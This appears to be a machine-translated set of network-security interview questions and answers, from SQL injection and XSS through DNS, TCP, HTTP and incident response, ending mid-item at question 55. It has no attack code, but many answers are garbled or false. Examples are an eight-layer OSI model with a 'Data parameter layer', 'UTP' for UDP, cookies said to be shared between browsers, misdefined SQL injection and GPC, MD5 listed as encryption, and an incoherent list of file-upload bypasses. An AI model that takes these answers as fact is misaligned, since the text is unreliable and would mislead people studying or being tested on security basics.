1. What is SQL injection attack?
The front-end code was not parsed and was substituted into the database, causing the database to report an error.
2. What is XSS attack?
Cross-site scripting attacks embed client-side malicious scripts in web pages. S language is commonly used, but other scripting languages are also used.
It is a client-side attack. The victim is the user, and the website administrator is also a user. The attacker usually relies on the administrator's identity as a springboard.
3. What is CSRF attack?
When the program was developed, the token and REFERER of the relevant pages were not judged, allowing the attacker to construct his own URL address to deceive the target user into clicking.
4. What is a file upload vulnerability?
The arbitrary file upload vulnerability refers to the fact that due to the programmer's insufficient control or processing defects on the user's file upload part, the user can upload executable dynamic script files to the server beyond his or her own permissions.
5. DDos attack
Distributed denial of service, a distributed denial of service attack refers to the use of client/server technology to unite multiple computers as an attack platform to launch DDoS attacks on one or more targets, thereby exponentially increasing the power of the denial of service attack.
6. Distribution map of important protocols
1. Network layer, IP protocol + MAC address
2. Transport layer, TCP, UTP protocols
3. Application layer, HTTP, SSH, FTP protocols
7. Working principle of arp protocol
Any time a host has an IP datagram to send to another host, it needs to know the logical (IP) address of the recipient. But IP addresses must be encapsulated into frames to pass through the physical network. This means that the sender must have the physical (MAC) address of the receiver, so the logical address to physical address mapping needs to be completed. The ARP protocol can receive the logical address from the IP protocol, map it to the corresponding physical address, and then submit the physical address to the data link layer.
8. What is RARP? How does it work?
In a computer network, each device has a unique physical address (MAC address) that is used to identify the device on the local network. However, to communicate on the network, each device also needs to have a unique IP address. Typically, IP addresses are manually configured, but in some cases, automatic IP address assignment may be required. At this time, you need to use the RARP protocol.
1. When a device starts up, it will send a RARP request to the network to obtain its own IP address.
2. After receiving the request, the RARP server will search for the MAC address of the device and return its corresponding IP address to the device.
3. After the device receives the IP address, it can start communicating on the network.
It should be noted that the RARP protocol only works within the LAN because it requires communication between all devices on the same physical network. In larger networks, the DHCP protocol is often used to automatically assign IP addresses.
9. What is dns? How does dns work?
DNS is a distributed naming system that maps domain names to IP addresses. The main role of DNS is to convert user-friendly domain names into IP addresses that computers can understand so that user requests can be routed to the correct server.
How DNS works:
1. The user enters a domain name in the browser, such as www.example.com.
2. The operating system sends a DNS query request to the local DNS server, asking for the IP address of the domain name www.example.com.
3. If the local DNS server has the IP address of www.example.com stored in its cache, it will return that IP address.
4. If the local DNS server does not know the IP address of www.example.com, it will send a query request to the root DNS server.
5. The root DNS server will direct the local DNS server to the top-level DNS server responsible for the .com domain.
6. The local DNS server will send a query request to the .com top-level DNS server to request the IP address of www.example.com.
7. The .com top-level DNS server will direct the local DNS server to the authoritative DNS server responsible for example.com.
8. The local DNS server will send a query request to the authoritative DNS server of example.com, requesting the IP address of www.example.com.
9. The authoritative DNS server will return the IP address of www.example.com, and the local DNS server will cache the result and return it to the operating system.
10. The operating system will use the IP address to connect to the server of www.example.com to obtain the required web pages or other resources.
10. What is the rip protocol? How does rip work?
RIP is a distance vector-based routing protocol used to exchange routing information in a LAN or WAN and calculate the best routing path. RIP is a relatively simple routing protocol commonly used in small network environments.
How the RIP protocol works:
1. The RIP protocol divides the entire network into several network segments. Each network segment has a unique identifier, called a network number.
2. Each router maintains a routing table, recording the distance to different networks and the information of the next hop router.
3. The router will periodically broadcast its routing table information to neighboring routers to let neighboring routers know its routing situation.
4. When a router receives routing information from an adjacent router, it will compare its own routing table with it. If the adjacent router provides a shorter path, it will update its own routing table and add this information. Broadcast to neighboring routers.
5. The router will continuously update its routing table until all routing information has been propagated to every router in the network and all routing tables in the network are consistent.
11. Disadvantages of RIP
1. Slow convergence speed: When a fault occurs or the topology changes in the network, the RIP protocol takes a long time to update the routing table of the entire network. This is because the RIP protocol has a long update cycle and uses a distance vector algorithm, which cannot quickly adapt to network changes.
2. Does not support large-scale networks: The RIP protocol can only support smaller-scale networks. When the network scale becomes larger, the RIP protocol will generate a large amount of routing information, thereby consuming a large amount of bandwidth and processing power, resulting in a decline in network performance.
3. Does not support VLSM: The RIP protocol can only support fixed-length subnet masks and cannot support variable-length subnet masks (VLSM), which limits the application of the RIP protocol in complex network environments.
4. Poor security: The RIP protocol does not verify and encrypt routing information, making it vulnerable to deception and attacks, leading to network security problems.
12. OSPF protocol? How OSPF works
OSPF is a routing protocol used to implement the shortest path first (SPF) algorithm in a single autonomous system (AS) to determine the transmission path of data packets.
How the OSPF protocol works:
1. Neighbor discovery: In the neighbor discovery phase, the OSPF protocol confirms neighbor relationships by sending and receiving Hello messages. If a neighbor relationship is established between two routers, they will begin to exchange routing information.
2. Link state database synchronization: Each OSPF router stores their link state information in a local link state database (Link State Database, LSDB). When two neighbor routers establish a neighbor relationship, they will exchange their respective link status information and store it in the local LSDB. At this point, each router will attempt to synchronize their LSDBs.
3. SPF calculation: After each router has a complete LSDB, they will use the SPF algorithm to calculate the shortest path tree (Shortest Path Tree) and store it in the routing table. The shortest path tree refers to the shortest path from a router to all other routers.
4. Routing update: Each router will periodically send update messages to notify other routers that their link status has changed. When a router receives an update message, it updates its LSDB and recalculates the shortest path tree.
5. Data transmission: When a data packet arrives at a router, the router will use the shortest path tree to determine the next router and forward the data packet to that router.
13. Summary of the differences between TCP and UDP?
1. Connection: TCP is a connection-oriented protocol, while UDP is a connectionless protocol. This means that TCP requires a connection to be established before sending data, while UDP does not.
2. Reliability: TCP provides reliable data transmission because it uses confirmation and retransmission mechanisms to ensure the correctness of data transmission. UDP does not have this mechanism, so packets may be lost.
3. Speed: UDP is faster than TCP because it does not establish a connection and confirmation mechanism, and data can be transmitted faster.
4. Bandwidth: TCP has adaptive congestion control, which can dynamically adjust the transmission rate to adapt to network conditions, thereby maximizing the use of available bandwidth. UDP does not have this function.
5. Scope of application: TCP is suitable for applications that require reliable transmission and orderly delivery, such as email, file transfer, and web browsers. UDP is suitable for applications that require fast transmission and real-time performance, such as video streaming, games and audio calls.
14. What is a three-way handshake and four waves? Why does TCP need a three-way handshake?
The three-way fingershake is the process of three data exchanges between the client and the server when establishing a TCP connection.
1. The client sends a SYN packet to the server, indicating a request to establish a connection.
2. The server receives the SYN request and sends a SYN+ACK packet to the client to confirm the request and agree to establish the connection.
3. The client receives the SYN+ACK request from the server and sends an ACK packet to the server to confirm that the connection has been established.
The four finger waving is the process of four data exchanges between the client and the server when TCP closes the connection.
1. The client sends a FIN packet to the server, indicating a request to close the connection.
2. The server receives the FIN request and sends an ACK packet to the client to confirm receipt of the request.
3. The server sends a FIN packet to the client, indicating that the server also requests to close the connection.
4. The client receives the server's FIN request and sends an ACK packet to the server to confirm receipt of the request and the connection is officially closed.
Why does tcp need three handshakes?
Mainly to ensure the reliability of the connection. During the process of establishing a connection, it is necessary to ensure that the sending and receiving capabilities of both parties are normal, otherwise normal communication will not be possible after the connection is established. The three-way handshake ensures normal information transfer between the client and the server and prevents delayed packets in the network from being mistaken for valid connection requests.
15. The difference between GET and POST
1. GET requests are used to obtain resources and usually do not change the data on the server. GET requests pass data through the URL, and the data is appended to the end of the URL to form a query string. The query string starts with a question mark "?" and the parameters are connected with the "&" symbol. Since the data is passed in clear text, it is not suitable for transmitting sensitive data. In addition, the length of URLs is limited, and different browsers have different restrictions on URL length.
2. POST request is used to submit data, which usually changes the data on the server. POST requests pass data through the request body, and the data is not appended to the URL. Because the data is included in the request body, there is no URL length limit for POST requests. POST requests are suitable for transmitting large amounts of data or sensitive data. GET requests are suitable for requesting data, while POST requests are suitable for submitting data.
16. The difference between cookies and sessions
The main difference between Cookies and Session is that Cookies is a technology that stores data on the client side, while Session is a technology that stores data on the server side. Cookies can store simple information, while Session can store any type of data. In addition, Cookies can be shared between multiple browsers, while Sessions can only be shared between the same browser.
17. How does session work?
1. When a user accesses a page that requires authentication, the server creates a unique Session ID and stores the ID in a data structure called a Session object.
2. The server will send the Session ID to the client's browser, usually by setting a header named "Set-Cookie" in the HTTP response header.
3. When the client's browser receives the Session ID sent by the server, it stores the ID in a data structure called a cookie so that the ID can be sent back to the server in subsequent requests.
4. When the user makes other requests, the browser will automatically send the cookie containing the Session ID back to the server. The server will find the corresponding Session object based on the Session ID, and read or store the user data associated with the Session object.
5. When the user closes the browser or the Session times out, the Session object and Session data will be deleted from the server memory to release server resources.
18. A complete HTTP request process
1. DNS resolution: When the browser initiates a URL request, it first needs to convert the domain name in the URL into the corresponding IP address. This process is called DNS resolution. The browser will first check whether the IP address of the domain name exists in the cache, and if not, initiate a request to the local DNS server.
2. Establish a TCP connection: Once the browser obtains the IP address of the target server, it needs to establish a TCP connection. A TCP connection is a reliable connection that is established through a three-way handshake.
3. Initiate an HTTP request: After the TCP connection is established, the browser will send an HTTP request to the server. HTTP requests include request method (GET, POST, PUT, DELETE, etc.), URL, HTTP version number, request header and other information.
4. Server response: After the server receives the request, it will process it according to the request content and return an HTTP response to the browser. HTTP response includes response status code, response header, response body and other information.
5. Receive response content: After the browser receives the HTTP response returned by the server, it will determine the type of the response body based on the Content-Type field in the response header, and then parse the response body into the corresponding format and render it.
6. Close the TCP connection: When the response content is transmitted, the TCP connection will be closed and resources will be released.
19. The difference between HTTPS and HTTP
HTTP is Hypertext Transfer Protocol, which is a basic protocol for transferring data, but it does not provide any data encryption or authentication capabilities. This means that the data transmitted by HTTP can be eavesdropped or tampered with, so it is not suitable for transmitting sensitive data such as credit card numbers, passwords, etc.
HTTPS is a security protocol based on HTTP, which ensures data security by adding SSL/TLS encryption on top of HTTP. HTTPS authenticates the web server by using digital certificates and uses public key encryption algorithms to encrypt data transmission to ensure that the data is not eavesdropped or tampered with during transmission. This makes HTTPS ideal for transmitting sensitive data such as credit card numbers, passwords, etc.
20. What are the seven-layer models of OSI?
Physical layer --> Data parameter layer --> Data link layer --> Network layer --> Transport layer --> Presentation layer --> Application layer
21. The difference between http long connection and short connection
HTTP short connection means that after the client sends a request to the server, the server closes the connection immediately after returning a response. The advantage of this method is that it can save server resources, but each request requires establishing a new connection, which may increase the request delay and reduce performance.
HTTP long connection means that after a connection is established between the client and the server, multiple requests and responses are made on this connection. The advantage of this method is that it can reduce the cost of establishing a connection and improve performance, but it will increase the occupation of server resources.
It should be noted that HTTP long connections do not always maintain an open connection, but maintain the connection status within a certain period of time. After a certain period of time, if there are no new requests and responses, the connection will be automatically closed to release server resources.
22. How does TCP ensure reliable transmission?
1. Sequence number and confirmation response mechanism: Each TCP message segment has a unique sequence number, which is used to identify the position of the message segment in the data flow. After receiving the message, the TCP receiver will send a confirmation response to tell the sender which data has been received. If the sender does not receive an acknowledgment, it will resend the segment.
2. Sliding window mechanism: TCP uses a sliding window mechanism to control the amount of data sent by the sender. The receiver will tell the sender its receiving window size, and the sender will send data according to the receiver's window size. If the sender sends more data than the receiver's window size, the receiver will refuse to receive the excess data.
3. Timeout retransmission mechanism: If the sender does not receive a confirmation response, it will think that the data is lost and will resend the data. The sender will determine the time interval and number of retransmissions based on the timer to ensure reliable transmission of data.
4. Congestion control mechanism: TCP uses a congestion control mechanism to control traffic in the network to prevent network congestion. If there is congestion in the network, TCP will reduce the sending rate of the sender to reduce the degree of network congestion.
23. What are the common status codes?
1xx (informational status code): Indicates that the request has been received and processing continues.
100 Continue: The request has been accepted and the client should continue the request.
101 Switching Protocols: The requested protocol has changed.
2xx (success status code): Indicates that the request has been successfully received, understood, and accepted.
200 OK: The request was successfully processed.
201 Created: The request was successfully processed and the resource was created.
202 Accepted: The server has accepted the request, but has not completed the processing.
204 No Content: The request has been successfully processed, but there is no response content.
3xx (redirect status code): Indicates that further action from the client is required to complete the request.
301 Moved Permanently: The requested resource has been permanently moved to a new location.
302 Found: The requested resource has been temporarily moved to a new location.
304 Not Modified: The requested resource has not been modified and the client can use local cache.
4xx (client error status code): Indicates that the request submitted by the client has an error.
400 Bad Request: The request is invalid and the server cannot parse the request.
401 Unauthorized: The request requires authentication.
403 Forbidden: The request was rejected by the server.
404 Not Found: The requested resource does not exist.
5xx (server error status code): Indicates that the server encountered an error while processing the request.
500 Internal Server Error: Server internal error.
503 Service Unavailable: The server is currently unable to process the request. Generally, the server is overloaded or under maintenance.
2 4. What is SSL? How does https ensure the security of data transmission (how does SSL work to ensure security)
SSL is used for secure communication on the network. The main purpose of SSL is to protect the security, integrity and confidentiality of data transmitted over the network.
HTTPS is a security protocol that adds the SSL/TLS protocol to the HTTP protocol, which can ensure that the communication between the website and the client is encrypted and secure.
How does HTTPS ensure the security of data transmission?
1. Encryption: The SSL/TLS protocol uses a combination of symmetric encryption and asymmetric encryption to ensure the security of data during transmission. Symmetric encryption is used to encrypt data, and asymmetric encryption is used to exchange keys between the client and server.
2. Authentication: The certificate issued by the certificate authority is used to verify the identity and public key of the server to prevent man-in-the-middle attacks and deception.
3. Integrity: The SSL/TLS protocol uses a message digest algorithm to generate a message digest by hashing the message to ensure data integrity during transmission.
25. How to ensure that the public key is not tampered with?
1. Digital signature: Before the public key is released, use the private key to digitally sign the public key. In this way, when verifying the public key, you only need to verify the digital signature to determine the authenticity of the public key.
2. Public Key Infrastructure (PKI): PKI is a set of technologies and protocols used to manage digital certificates and public keys to ensure the security and reliability of public keys.
3. Public key hashing: Hash the public key and then publish the hash value to ensure that the public key has not been tampered with.
4. Physical protection: Storing the public key in a physical device, such as a smart card or USB key, can protect the public key from tampering.
26. How to use absolute path in php?
1. dirname(__FILE__) or dirname(__FILE__): Both of these functions can get the directory name of the current script, which is the path to the folder where the current script is located. You can then use the realpath() function to convert the directory name to an absolute path. For example: $absPath = realpath(dirname(__FILE__));
2. $_SERVER['DOCUMENT_ROOT']: This variable contains the absolute path to the document root directory where the current script is located. You can use this variable with the $_SERVER['PHP_SELF'] variable to get the absolute path to the current script. For example: $absPath = $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF'];
It should be noted that you need to pay attention to security when using the $_SERVER['PHP_SELF'] variable, as it may be attacked by malicious users. It is recommended to use $_SERVER['SCRIPT_NAME'] or $_SERVER['SCRIPT_FILENAME'] variables instead of $_SERVER['PHP_SELF'].
27. What are your commonly used penetration tools, and which one is the most commonly used?
1、Burp Suite
2、SQLmap
3、Nmap
4、kali linux
5、Hydra
6. Swiss Army Knife
Commonly used tools include:
1、Burp Suite
2、SQLmap
3、Nmap
4、kali linux
5、Hydra
6. Swiss Army Knife
28. Utilization of XSS blind typing to intranet server
Blind XSS typing means that the attacker directly attempts to exploit known XSS vulnerabilities without conducting vulnerability detection first. In some cases, attackers may attack intranet servers through blind XSS.
An attacker may use XSS vulnerabilities to inject malicious code, so that after the code is executed in the victim's browser, a request is sent to a server controlled by the attacker to obtain sensitive information of the intranet server. This attack method usually requires the attacker to prepare a malicious server in advance to receive requests sent to the server and obtain sensitive information.
29. Harpoon attacks and puddle attacks
1. Harpoon attack refers to an attack method in which hackers deceive specific targets by pretending to be a trusted source to obtain sensitive information or conduct other malicious activities. This kind of attack is usually carried out through communication methods such as email or social media. Hackers will target a specific person or organization and guide the victim to click on a link or download an attachment by forging trust, thereby allowing the victim to leak Confidential information or install malware.
2. Refers to an attack method in which hackers attack websites frequently visited by victims to obtain sensitive information or conduct other malicious activities. This kind of attack usually attacks the target website, causing users who visit the website to be infected or redirected to malicious websites, allowing hackers to obtain the user's sensitive information or control the user's computer.
Briefly: A spearpoon attack is an attack that targets an individual or organization, while a watering hole attack is an attack that targets a wide range of users.
30. What is virtual machine escape?
This refers to an attacker taking advantage of vulnerabilities in virtualization software or operating systems to gain control of the physical host from the virtual machine (VM) environment. An attacker can use virtual machine escape attacks to bypass security measures, gain access to the entire physical host, and access all sensitive data stored within it.
31. Man-in-the-middle attack?
It refers to an attack method in which the attacker steals the communication data between the two parties during the communication process and attempts to tamper with or replay the data. Attackers usually insert a malicious intermediate node between the user and the server. This node will pretend to be a normal communication node, making both parties think they are communicating directly with the other party.
32. TCP three-way handshake process?
1. The client sends a connection request (SYN) packet to the server, which contains the client's initialization sequence number (ISN).
2. After the server receives the request, it replies with a SYN packet with a confirmation sequence number (ACK), which contains the server's initialization sequence number (ISN).
3. The client sends a packet with an acknowledgment sequence number (ACK) again to ensure that the connection has been established.
33. Seven-layer model?
Physical layer --> Data parameter layer --> Data link layer --> Network layer --> Transport layer --> Presentation layer --> Application layer
34. Understanding of cloud security
Cloud security refers to protecting the security of cloud and cloud-related resources in a cloud computing environment. Cloud security includes protecting the security of cloud computing infrastructure, the security relationship between cloud service providers and cloud users, and the security of data stored and processed in the cloud.
Cloud security requires a series of measures to ensure the security of the cloud computing environment. These measures include but are not limited to:
1. Authentication and access control: Ensure that only authorized users can access cloud services and data stored in the cloud.
2. Data protection: Use data encryption, backup, disaster recovery and other measures to protect the security of data stored in the cloud.
3. Network security: Ensure the reliability and security of the network and prevent network attacks.
4. Compliance: Ensure the compliance of cloud services and meet relevant laws, regulations and standard requirements.
5. Security monitoring and log auditing: Discover and respond to security events and threats by monitoring and auditing operations and activities in the cloud.
35. Have you ever learned about websocket?
Understood
WebSocket is a network protocol for full-duplex communication over a single TCP connection. It makes real-time data transfer between browser and server easier. Unlike the HTTP request-response protocol, the WebSocket connection remains open, allowing two-way communication, so data can be updated in real time over the WebSocket connection without the need for constant HTTP requests to obtain updates.
The establishment of a WebSocket connection requires a handshake process, during which the client and server exchange information to establish the connection. After a successful connection is established, the client and server can send messages to each other. These messages can be in formats such as text, binary data, or JSON. On the server side, the WebSocket API is typically used to handle received messages and respond to client requests.
Because the WebSocket protocol runs on a single TCP connection, network latency and bandwidth consumption can be reduced. It also allows the server to push data to the client, which is useful for real-time data updates and instant messaging.
Often used in web development
36. What is DDOS? What are they? What are CC attacks? What are the differences?
1. DDOS is a type of network attack. The attacker controls multiple computers or devices and initiates a large number of requests to the target server or network, making it unable to process legitimate network traffic normally, resulting in service unavailability. The attacker's goal is usually to prevent the target system from providing normal services, thereby causing economic losses or affecting its reputation.
2. Common DDOS attack methods include:
SYN Flood: Exploiting vulnerabilities in the TCP three-way handshake protocol, sending a large number of SYN requests and exhausting server resources.
ICMP Flood: Use the ping command to send a large number of ICMP requests to the target server, exhausting server resources.
UDP Flood: Utilizes the characteristics of the UDP protocol to send a large number of UDP data packets, occupying server bandwidth and CPU resources.
3. CC attack (HTTP Flood) is a special DDOS attack method, which mainly targets web servers. Attackers forge HTTP requests, send a large number of requests to the web server, and simulate user access, thus overloading the server and preventing it from processing legitimate network traffic.
4. Difference:
Different attack objects: DDoS is an attack on IP. CC attacks target web pages.
The harm is different: DDoS attacks are more harmful and more difficult to defend against. The harm of CC attacks is not devastating, but it lasts for a long time.
Different thresholds: The threshold for DDoS attacks is high. Attackers generally need to collect information such as the number of target hosts under attack, their addresses, and the configuration performance of the target hosts before attacking. Blind attacks may lead to poor results. The CC attack threshold is low, and the attack can be carried out by using the IP proxy tool. The target is relatively clear, and users with relatively low hacker skills can also carry out the attack.
Different traffic sizes: DDoS attacks require larger traffic than CC attacks, and CC attacks sometimes do not require large traffic.
37. What is a land attack?
1. If you mention "land attack" in the field of computer security, then it refers to an early denial of service attack (DoS attack) technology. The attacker sends specially crafted IP data packets to the target computer, in which the source IP address and target IP address are set to the IP address of the target computer. This attack will cause the target computer to fall into an infinite loop and eventually be unable to respond to other network requests. This attack is now rare because modern operating systems have fixed the vulnerability.
2. If you mention "land attack" in the field of online games, then it refers to an attack method that exploits game engine vulnerabilities. Attackers can use these vulnerabilities to cause the target player's game client to crash or freeze. This attack can also be considered a DoS attack.
38. How will you collect information?
Collect second-level domain names, IP sensitive information collection, fingerprints, WAF identification, CDN identification, and marginal C paragraph
39. What is a CRLF injection attack?
A CRLF injection attack is a web application vulnerability that allows an attacker to inject malicious HTTP response headers into the HTTP headers. An attacker can use a CRLF injection attack to manipulate HTTP responses to gain access to the server, or an attacker can bypass security controls to gain unauthorized access to sensitive information.
40. To prevent XSS, think from two perspectives: front-end and back-end?
front end:
1) Use HTTPS protocol to protect user data and transmit data.
2) Use escape characters to filter special characters entered by users to prevent attackers from injecting malicious JavaScript code.
3) Users are prohibited from uploading executable files, such as .exe, .vbs, etc.
4) Use HTTP headers to limit the loading of web page content to prevent XSS attacks.
rear end:
1) Use parameter verification to check whether the data entered by the user meets the requirements. If it does not meet the requirements, access is denied.
2) Use prepared statements to execute SQL queries to prevent SQL injection attacks.
3) Use secure encryption algorithms to encrypt data to prevent data leakage.
4) Use secure HTTP headers to limit the loading of web page content to prevent XSS attacks.
41. How to protect the security of a port?
1. Use a firewall: A firewall can protect port security by blocking unauthorized network traffic from entering the network.
2. Install security software: Installing security software can detect and block the intrusion of malware and viruses, thereby protecting port security.
3. Implement security policies: Implementing security policies can restrict users from accessing specific ports, thereby protecting port security.
4. Regularly update the operating system: Regularly updating the operating system can fix vulnerabilities and thus protect port security.
5. Encrypted data transmission: Data transmission can be protected using encryption technology to protect port security.
42. Webshell detection ideas?
1. Check the file name: Check if the file name is related to webshell, if so, it may be webshell.
2. Check the file content: Check whether the file content contains webshell characteristics. If so, it may be a webshell.
3. Check file permissions: Check whether the file permissions have been changed, if so, it may be the webshell.
4. Check the file time: Check the creation time and modification time of the file. If there is an abnormality, it may be the webshell.
5. Check the file size: Check the file size. If the file size is abnormal, it may be the webshell.
43. What is GPC? How to bypass it if it is enabled?
GPC is the abbreviation of GET, POST, and COOKIE, which is used to describe the three types of data that users can submit when submitting a URL. If you want to bypass GPC, you can use URL rewriting, pseudo-static, XMLHttpRequest and other technologies.
URL rewriting can place URL parameters in the URL path, but they will not be displayed in the URL, thus avoiding GPC filtering.
Pseudo-static can rearrange a normal URL to make it look more attractive, or hide URL parameters to bypass GPC filtering.
XMLHttpRequest can send POST requests to the background without sending any URL parameters, thus avoiding being filtered by GPC.
44. What are the encryption algorithms commonly used on the web?
1. MD5: Message-Digest Algorithm 5, information digest algorithm, often used for file verification.
2. SHA: Secure Hash Algorithm, a secure hash algorithm, commonly used in security authentication scenarios such as digital signatures.
3. HMAC: Hash Message Authentication Code, hash message authentication code, often used for message integrity verification.
4. AES: Advanced Encryption Standard, advanced encryption standard, often used for data encryption.
5. RSA: Rivest-Shamir-Adleman, commonly used for digital signatures and encryption.
6. DES: Data Encryption Standard, data encryption standard, often used for encryption and decryption.
7. 3DES: Triple DES, triple data encryption algorithm, is an improved version of DES.
8. Blowfish: A symmetric encryption algorithm that can be used to encrypt large amounts of data.
9. Twofish: A symmetric encryption algorithm that can be used to encrypt large amounts of data.
10. RC4: A stream cipher algorithm that can be used to encrypt large amounts of data.
11. PBKDF2: Password-Based Key Derivation Function 2, password-based key derivation function 2, often used to encrypt passwords.
12. Bcrypt: A password hash function that can be used to encrypt passwords.
13. SCrypt: A password hash function that can be used to encrypt passwords.
14. Argon2: A password hash function that can be used to encrypt passwords.
45. What else can XSS do besides obtaining cookies?
Other things that XSS can be used to do are:
1. Hijacking user sessions: Through XSS attacks, attackers can access the victim’s user session to obtain the user’s login credentials or other sensitive information.
2. Modify the content of the web page: XSS attacks can be used to modify the content of the web page to deceive the victim.
3. Destroy the website structure: XSS attacks can be used to destroy the website structure, thus affecting the normal operation of the website.
4. Obtain user data: XSS attacks can be used to obtain users’ sensitive information, such as users’ personal information, financial information, etc.
5. Execute malicious scripts: XSS attacks can be used to execute malicious scripts to attack websites or perform other malicious activities.
6. Spread worms: XSS attacks can be used to spread worms, thereby spreading malicious programs in the victim's network.
7. Hijacking browsers: XSS attacks can be used to hijack browsers to control users’ browsing habits.
8. Pop-up malicious advertisements: XSS attacks can be used to pop up malicious advertisements, thus affecting the normal use of users.
9. Inject malicious code: XSS attacks can be used to inject malicious code, thereby affecting the normal operation of the website.
10. Manipulate search results: XSS attacks can be used to manipulate search results to allow victims to access the website the attacker intended them to access.
11. Spreading Trojans: XSS attacks can be used to spread Trojans to attack websites or steal user information.
12. Hijacking a website: XSS attacks can be used to hijack a website and thereby control its content and functionality.
46. Operator (or other) network hijacking
1. When a network hijack occurs, the request is intercepted by the operator (or other hijacker), and they send a response. Hijackers may insert malicious content, place ads, and modify content by injecting scripts. Hijackers may intercept specific content as well as users' HTTP requests, thereby controlling the user's browsing experience.
2. Network hijacking may cause security and privacy issues because hijackers can collect users' sensitive information, such as user credentials and login information. It may also result in reduced network traffic and the web pages may become very slow due to ads and injected scripts.
3. To avoid network hijacking, you can use SSL/TLS protocols to protect communications, verify websites before sending sensitive data, and use a trusted VPN to encrypt communications. Additionally, you should regularly update your device’s operating system and browser, and only download software or applications from trusted sources.
4. To continue to prevent network hijacking, some dangerous functions in the network should be disabled, such as domain name server (DNS) dynamic updates, DNS redirection, and remote access functions. Additionally, security software should be set up to help detect potential network hijacking activity. Finally, operators can set up grayscale testing policies to help detect breaches of activity.
47. What is DNS spoofing?
DNS spoofing is a cyberattack technique that alters the local DNS (Domain Name System) tables on the Internet that look up web servers and other Internet resources. By changing the DNS records on the server, an attacker can redirect Internet traffic to an attacker-controlled server, which can be used to steal data, plant malware, or redefine unauthorized network configurations.
48. Buffer overflow principles and defenses
Buffer overflow is a software vulnerability in which an attacker can exploit a memory unit that holds data to cross-border access to other memory spaces. Accessing such memory can cause the system to crash or execute malicious code.
To prevent buffer overflow attacks, a variety of measures can be taken, including using stack protection mechanisms (such as stack overflow protection, bounds-checked buffers), using isolated memory technology (ASLR), and using deep inspection technologies (such as malicious code inspection, anti- Compilation check). In addition, dynamic analysis technology (such as online analysis) and code audit technology can also be used to prevent buffer overflows.
49. Emergency response to network security incidents
Cyber security incident emergency response means that when a cyber security incident occurs, enterprises should organize relevant departments to coordinate and take corresponding response measures in a timely manner according to the requirements of the cyber security emergency response plan or cyber security incident plan.
it includes:
(1) Emergency plan design: Predict and analyze security incidents, and formulate network security emergency response plans and network security incident handling plans to respond to network security incidents.
(2) Fault elimination: Organize resources to conduct safety fault analysis, identify the cause of the fault and eliminate the source of the fault.
(3) Incident processing: Identify, analyze and handle network security incidents, and improve the follow-up processing process.
(4) Implementation of control measures: Develop and implement effective management measures to prevent the recurrence of network security incidents.
(5) Risk warning: Establish a network security risk early warning system and strictly improve network security management to prevent network security incidents in a timely manner.
(6) Data disposal: Collect, process and store all data involved during disposal to avoid recurrence of security incidents.
(7) Emergency testing: Analyze the processed network security status and implement emergency testing to ensure network security availability after security recovery.
(8) Emergency assessment: Summarize the handling of safety incidents, evaluate the effectiveness of emergency handling, and take effective improvement measures to reduce the probability of safety incidents.
(9) Security awareness training: Conduct network security awareness training for employees to enhance their network security awareness and make them familiar with network security technology, security risk assessment technology and network security threat information processing technology to prevent network security incidents.
(10) Review and audit: Regularly review and audit network security incidents and emergency response activities, and establish a long-term security emergency response mechanism.
50. Internal security of the enterprise
Internal security management of an enterprise refers to the management of the internal security status of the enterprise by the internal management organization of the enterprise, including safety management systems, safety management measures, safety management organizations and safety management personnel.
1. Develop a safety management system: Enterprises should formulate a safety management system to clarify the responsibilities, authorities and procedures of safety management to ensure the effective implementation of safety management.
2. Implement safety management measures: Enterprises should adopt effective safety management measures according to the safety management system to ensure the stability of the internal safety situation of the enterprise.
3. Establish a safety management organization: Enterprises should establish a safety management organization to be responsible for safety management and ensure the effective implementation of safety management.
4. Training safety management personnel: Enterprises should regularly train safety management personnel to equip them with safety management knowledge and skills to ensure the effective implementation of safety management.
continue
5. Regularly check the security status: Enterprises should regularly check the internal security status of the enterprise, promptly discover safety hazards, and take effective measures to ensure the stability of the internal security status of the enterprise.
6. Handle safety incidents in a timely manner: Enterprises should handle safety incidents in a timely manner, analyze the causes of the accidents, and take effective measures to prevent safety incidents from occurring.
7. Regularly evaluate safety management: Enterprises should regularly evaluate the effectiveness of safety management, promptly discover problems in safety management, and take effective measures to ensure the effective implementation of safety management.
8. Regularly update the safety management system: Enterprises should regularly update the safety management system to adapt it to the actual situation of the enterprise to ensure the effective implementation of safety management.
9. Regularly carry out safety publicity: Enterprises should regularly carry out safety publicity to enable employees to fully understand the importance of safety management and ensure the effective implementation of safety management.
10. Establish safety files: Enterprises should establish safety files to record relevant information on safety management to facilitate the effective implementation of safety management.
51. How to test the business before going online and from what angles?
First, you need to know if your website is functioning properly. If your website displays an "error message" check it out. If your website is functioning properly, you can test how well it works by testing your website's functionality. For example, you can test your website's page loading speed and page display.
Secondly, you need to know whether the content of your website is correct. If there is a problem with the content of your website, you can test its effectiveness by testing the format of the content and the structure of the data on your website. For example, you can test the formatting of your website's content and the structure of its data.
Finally, you need to know if your website has the right links. If you're having problems with your website's links, you can test its effectiveness by testing the structure and functionality of your website's links. For example, you can test the structure and functionality of your website's links.
52. The application has vulnerabilities but cannot be repaired or deactivated. What should you do?
1. Notify the application developer as soon as possible so that they can fix the vulnerability as soon as possible.
2. Minimize the use of applications to reduce the impact of vulnerabilities.
3. Limit application usage permissions to the minimum to reduce the impact of vulnerabilities.
4. Regularly check the security of applications, discover vulnerabilities in a timely manner and take effective measures.
5. Limit application usage to trusted environments to reduce the impact of vulnerabilities.
53. How to protect against CSRF?
1. Set a unique session identifier (similar to a token) every time the user logs in;
2. Append this session identifier to the form before submitting it;
3. After accepting form submission, use the session identifier to compare with the value previously stored on the server;
4. After successful verification, this identifier will be deleted or a new identifier will be regenerated;
5. If verification fails, the request will be rejected, the user will be redirected back to the login page, or a warning will be given.
54. How to bypass file upload?
1. File extension bypass: Change the file suffix to a common file extension, such as .js, .jpg, .exe, etc.;
2. Modify the file extension based on the file header information: Some image files, such as png, gif, jpg, etc., have their own file headers, and their file headers can be modified at the beginning of the file;
3. Upload using base64 encoding: Encode the file to be uploaded with Base64, and then upload it in combination with XMLHttpRequest;
4. String file upload: convert it into a string according to the file format, and then use eval and other functions to obtain the value;
5. "Multipart/form-data" information: Generally, Web applications use this format to upload files, using multi-level segmentation to pass a string $_FILES file field array;
6. Use database to store files: You can treat files as binary data, store them in the database, and then obtain the path to download;
7. Missing file types: Try to upload various types of files to bypass restrictions with illegal file types, such as JSP, etc.;
8. Exe reflection: Exe reflection loading is to compile unmanaged code (such as C++) into an executable module and load it from the executable program into the current application domain.
55. Verification code related utilization points
1. **Registration function bypass:**
